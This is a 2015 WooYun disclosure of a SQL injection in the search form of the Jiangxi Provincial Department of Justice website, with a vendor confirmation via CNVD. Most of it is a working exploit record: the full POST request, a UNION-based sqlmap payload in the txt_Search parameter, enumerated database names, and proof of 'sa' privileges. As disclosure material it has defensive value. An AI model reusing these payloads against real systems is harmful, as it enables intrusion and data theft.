当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139670

漏洞标题:江西省司法厅SQL注入漏洞

相关厂商:江西省司法厅

漏洞作者: 路人甲

提交时间:2015-09-10 11:47

修复时间:2015-10-26 13:40

公开时间:2015-10-26 13:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

江西省司法厅 搜索处存在POST注入漏洞 并为sa权限

详细说明:

POST /Browse/OnlineServer/DownLoad.aspx HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; Win64; x64) Presto/2.12.388 Version/12.17
Host: **.**.**.**
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Browse/OnlineServer/DownLoad.aspx
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 3588
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTMwNjI1MjQ1D2QWAgIBD2QWBgIDDxYCHgtfIUl0ZW1Db3VudAIZFjJmD2QWAmYPFQIn5b6L5biI5LqL5Yqh5omA5ZCN56ew6aKE5qC45YeG55Sz6K%2B36KGoFzIwMTUwMzI3MTAwNjMwODExMjUucmFyZAIBD2QWAmYPFQIt5b6L5biI5LqL5Yqh5omA57uE57uH5b2i5byP5Y%2BY5pu055Sz6K%2B355m76K6wFzIwMTQxMDMwMTA0MjU2NTE4NDcucmFyZAICD2QWAmYPFQIq6KGl5Y%2BR77yI5o2i5Y%2BR77yJ5b6L5biI5omn5Lia6K%2BB55Sz6K%2B36KGoFzIwMTQxMDMwMTA0MTQxNTQ0NzMucmFyZAIDD2QWAmYPFQIg5b6L5biI5qGj5qGI6LCD5Ye6KOWFpSnnlLPor7fooagXMjAxNDEwMzAxMDQwMjY3NDI2MC5yYXJkAgQPZBYCZg8VAiHlvovluIjlj5jmm7TmiafkuJrmnLrmnoTnlLPor7fooagXMjAxNDEwMzAxMDM5MTg2MTcyOC5yYXJkAgUPZBYCZg8VAg%2Flrp7kuaDpibTlrprkuaYXMjAxNDEwMzAxMDM4MTUyNDk5Ny5yYXJkAgYPZBYCZg8VAhXlvovluIjmiafkuJrmib%2For7rkuaYXMjAxNDEwMzAxMDM2NDkzNTYyMi5yYXJkAgcPZBYCZg8VAirkuK3ljY7kurrmsJHlhbHlkozlm73lvovluIjmiafkuJrnmbvorrDooagXMjAxNDEwMzAxMDM1NDkyMDI1Mi5yYXJkAggPZBYCZg8VAjnooaXlj5HvvIjmjaLlj5HvvInlvovluIjkuovliqHmiYDmiafkuJrorrjlj6%2For4HnlLPor7fooagXMjAxNDEwMzAxMDMyMzEzMzE3Ny5yYXJkAgkPZBYCZg8VAirlvovluIjkuovliqHmiYDkvY%2FmiYDlj5jmm7TlpIfmoYjlkYjmiqXooagXMjAxNDEwMzAxMDMxMzY0MTk2Ny5yYXJkAgoPZBYCZg8VAjnlvovluIjkuovliqHmiYDlkIjkvJnkurrlj5jmm7TvvIjpgIDlh7rvvInlpIfmoYjlkYjmiqXooagXMjAxNDEwMzAxMDMwMTkzNzExNC5yYXJkAgsPZBYCZg8VAjnlvovluIjkuovliqHmiYDlkIjkvJnkurrlj5jmm7TvvIjliqDlhaXvvInlpIfmoYjlkYjmiqXooagXMjAxNDEwMzAxMDI3NDM2NjcyNi5yYXJkAgwPZBYCZg8VAirlvovluIjkuovliqHmiYDlkIjkvJnljY%2Forq7lj5jmm7TnlLPor7fooagXMjAxNDEwMzAxMDI2MzU3NjAzNC5yYXJkAg0PZBYCZg8VAiTlvovluIjkuovliqHmiYDnq6DnqIvlj5jmm7TnlLPor7fooagXMjAxNDEwMzAxMDI1MjY4ODYyMi5yYXJkAg4PZBYCZg8VAiTlvovluIjkuovliqHmiYDlkI3np7Dlj5jmm7TnlLPor7fooagXMjAxNDEwMzAxMDI0MTAwNzE2OS5yYXJkAg8PZBYCZg8VAiflvovluIjkuovliqHmiYDotJ%2FotKPkurrlj5jmm7TnlLPor7fooagXMjAxNDEwMzAxMDIyNTcyNjYzNi5yYXJkAhAPZBYCZg8VAiTlvovluIjkuovliqHmiYDorr7nq4vnlLPor7fnmbvorrDooagXMjAxNDEwMzAxMDIxMzk0MjIyMi5yYXJkAhEPZBYCZg8VAirlvovluIjkuovliqHmiYDliIbmiYDorr7nq4vnlLPor7fnmbvorrDooagXMjAxNDEwMzAxMDE2NTYyOTczMy5yYXJkAhIPZBYCZg8VAiHms5XlvovogYzkuJrotYTmoLzosIPmoaPnlLPor7fkuaYXMjAxNDEwMjcxMDE1MzkzNjQ3My5yYXJkAhMPZBYCZg8VAirln7rlsYLms5XlvovmnI3liqHlt6XkvZzogIXmiafkuJrnmbvorrDooagXMjAxNDA5MTYxNTAxMzczNzIzOC56aXBkAhQPZBYCZg8VAh7lj7jms5XpibTlrprkurrnmbvorrDnlLPor7fooagXMjAxNDA5MTYxNTAxMjI5MjY2OS56aXBkAhUPZBYCZg8VAiHlj7jms5XpibTlrprmnLrmnoTnmbvorrDnlLPor7fooagXMjAxNDA5MTYxNTAxMTA5MzAyMS56aXBkAhYPZBYCZg8VAh7ku7Loo4Hlp5TlkZjkvJrnlLPor7fnmbvorrDooagXMjAxNDA5MTYxNTAwNTA3OTA0OS56aXBkAhcPZBYCZg8VAhvlhazor4HmnLrmnoTorr7nq4vmiqXlrqHooagXMjAxNDA5MTYxNTAwMzQzNzkxOC56aXBkAhgPZBYCZg8VAhXms5Xlvovmj7TliqnnlLPor7fooagXMjAxNDA5MTYxNTAwMjAwMTE0OS56aXBkAgQPDxYEHglUb3RhbFBhZ2VmHglQYWdlSW5kZXgCAWQWBgIBDxYCHglpbm5lcmh0bWwFATBkAgQPFgIfAwUBMWQCBQ8WAh8DBQExZAIFDxYCHwMF3AI8YnIgLz7nvZHnq5nnu7TmiqTvvJrmsZ%2Fopb%2FnnIHlj7jms5XljoXkv6Hmga%2FkuK3lv4Mg6LWjSUNQ5aSHMDUwMDY0ODflj7c8YnIgLz7lnLDlnYDvvJrmsZ%2Fopb%2FnnIHljZfmmIzluILnnIHmlL%2FlupzlpKfpmaLljZfkuIDot6845Y%2B3PGJyIC8%2B55S16K%2Bd77yaMDc5MS04NjIyMTYzMSAg5Lyg55yf77yaMDc5MS04NjIyMTc0MTxiciAvPumCrue8lu%2B8mjMzMDA0NiAgICAgIEVtYWls77yaanhzZkBqeHNmLmdvdi5jbjxiciAvPumakOengeWuieWFqOeUs%2BaYjiAmbmJzcDsmbmJzcDvniYjmnYPkv53miqTnlLPmmI48YnIvPuacrOe9keermemAgueUqElFNy4w5Lul5LiK54mI5pys5rWP6KeI5Zmo6K6%2F6ZeuPGJyLz5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5fU2VyY2gcDQ%2F8eFQz5GSbMqe1M6MRmjlpsg%3D%3D&__EVENTVALIDATION=%2FwEWCQLN9Iq6CgKTyPf7DQK%2FkdPzCALN46vwDQLVmMnSAQLpnfuOCAL5up6DBQLHxrikBQKv%2BOb%2BDi9ikKKo5WLBm0Hx947VCcNe0D9y&txt_Search=%E5%BE%8B%E5%B8%88%E4%BA%8B%E5%8A%A1%E6%89%80%E5%90%8D%E7%A7%B0%E9%A2%84%E6%A0%B8%E5%87%86%E7%94%B3%E8%AF%B7%E8%A1%A8&PageControl1%24txtPage=&btn_Serch.x=25&btn_Serch.y=13

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txt_Search
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTMwNjI1MjQ1D2Q
WAgIBD2QWBgIDDxYCHgtfIUl0ZW1Db3VudGZkAgQPDxYEHglUb3RhbFBhZ2VmHglQYWdlSW5kZXgCAWQ
WBgIBDxYCHglpbm5lcmh0bWwFATBkAgQPFgIfAwUBMWQCBQ8WAh8DBQExZAIFDxYCHwMF3AI8YnIgLz7
nvZHnq5nnu7TmiqTvvJrmsZ/opb/nnIHlj7jms5XljoXkv6Hmga/kuK3lv4Mg6LWjSUNQ5aSHMDUwMDY
0ODflj7c8YnIgLz7lnLDlnYDvvJrmsZ/opb/nnIHljZfmmIzluILnnIHmlL/lupzlpKfpmaLljZfkuID
ot6845Y+3PGJyIC8+55S16K+d77yaMDc5MS04NjIyMTYzMSAg5Lyg55yf77yaMDc5MS04NjIyMTc0MTx
iciAvPumCrue8lu+8mjMzMDA0NiAgICAgIEVtYWls77yaanhzZkBqeHNmLmdvdi5jbjxiciAvPumakOe
ngeWuieWFqOeUs+aYjiAmbmJzcDsmbmJzcDvniYjmnYPkv53miqTnlLPmmI48YnIvPuacrOe9keermem
AgueUqElFNy4w5Lul5LiK54mI5pys5rWP6KeI5Zmo6K6/6ZeuPGJyLz5kGAEFHl9fQ29udHJvbHNSZXF
1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5fU2VyY2jKDX318PymKpVZJBSWIkgG6hlEFQ==&__EVENTVAL
IDATION=/wEWCQLb1fffBAKTyPf7DQK/kdPzCALN46vwDQLVmMnSAQLpnfuOCAL5up6DBQLHxrikBQKv
+Ob+DjwAHrZMJtyIbw2s1/VkcnzCaLgE&searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3
%E9%94%AE%E5%AD%97%E6%90%9C%E7%B4%A2...&txt_Search=1' UNION ALL SELECT NULL,NULL
,NULL,CHAR(113)+CHAR(114)+CHAR(119)+CHAR(116)+CHAR(113)+CHAR(68)+CHAR(119)+CHAR(
66)+CHAR(66)+CHAR(113)+CHAR(72)+CHAR(107)+CHAR(71)+CHAR(110)+CHAR(108)+CHAR(113)
+CHAR(103)+CHAR(104)+CHAR(116)+CHAR(113)-- &PageControl1$txtPage=&btn_Serch.x=22
&btn_Serch.y=22
---
[10:18:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[10:18:37] [INFO] fetching database names
available databases [9]:
[*] JX_GZDB_NET
[*] JX_SendSMS
[*] jxsfdb
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txt_Search
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTMwNjI1MjQ1D2Q
WAgIBD2QWBgIDDxYCHgtfIUl0ZW1Db3VudGZkAgQPDxYEHglUb3RhbFBhZ2VmHglQYWdlSW5kZXgCAWQ
WBgIBDxYCHglpbm5lcmh0bWwFATBkAgQPFgIfAwUBMWQCBQ8WAh8DBQExZAIFDxYCHwMF3AI8YnIgLz7
nvZHnq5nnu7TmiqTvvJrmsZ/opb/nnIHlj7jms5XljoXkv6Hmga/kuK3lv4Mg6LWjSUNQ5aSHMDUwMDY
0ODflj7c8YnIgLz7lnLDlnYDvvJrmsZ/opb/nnIHljZfmmIzluILnnIHmlL/lupzlpKfpmaLljZfkuID
ot6845Y+3PGJyIC8+55S16K+d77yaMDc5MS04NjIyMTYzMSAg5Lyg55yf77yaMDc5MS04NjIyMTc0MTx
iciAvPumCrue8lu+8mjMzMDA0NiAgICAgIEVtYWls77yaanhzZkBqeHNmLmdvdi5jbjxiciAvPumakOe
ngeWuieWFqOeUs+aYjiAmbmJzcDsmbmJzcDvniYjmnYPkv53miqTnlLPmmI48YnIvPuacrOe9keermem
AgueUqElFNy4w5Lul5LiK54mI5pys5rWP6KeI5Zmo6K6/6ZeuPGJyLz5kGAEFHl9fQ29udHJvbHNSZXF
1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5fU2VyY2jKDX318PymKpVZJBSWIkgG6hlEFQ==&__EVENTVAL
IDATION=/wEWCQLb1fffBAKTyPf7DQK/kdPzCALN46vwDQLVmMnSAQLpnfuOCAL5up6DBQLHxrikBQKv
+Ob+DjwAHrZMJtyIbw2s1/VkcnzCaLgE&searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3
%E9%94%AE%E5%AD%97%E6%90%9C%E7%B4%A2...&txt_Search=1' UNION ALL SELECT NULL,NULL
,NULL,CHAR(113)+CHAR(114)+CHAR(119)+CHAR(116)+CHAR(113)+CHAR(68)+CHAR(119)+CHAR(
66)+CHAR(66)+CHAR(113)+CHAR(72)+CHAR(107)+CHAR(71)+CHAR(110)+CHAR(108)+CHAR(113)
+CHAR(103)+CHAR(104)+CHAR(116)+CHAR(113)-- &PageControl1$txtPage=&btn_Serch.x=22
&btn_Serch.y=22
---
[10:20:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[10:20:22] [INFO] fetching current user
current user: 'sa'

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-11 13:39

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江西分中心,由其后续协调网站管理单位处置。

最新状态:

暂无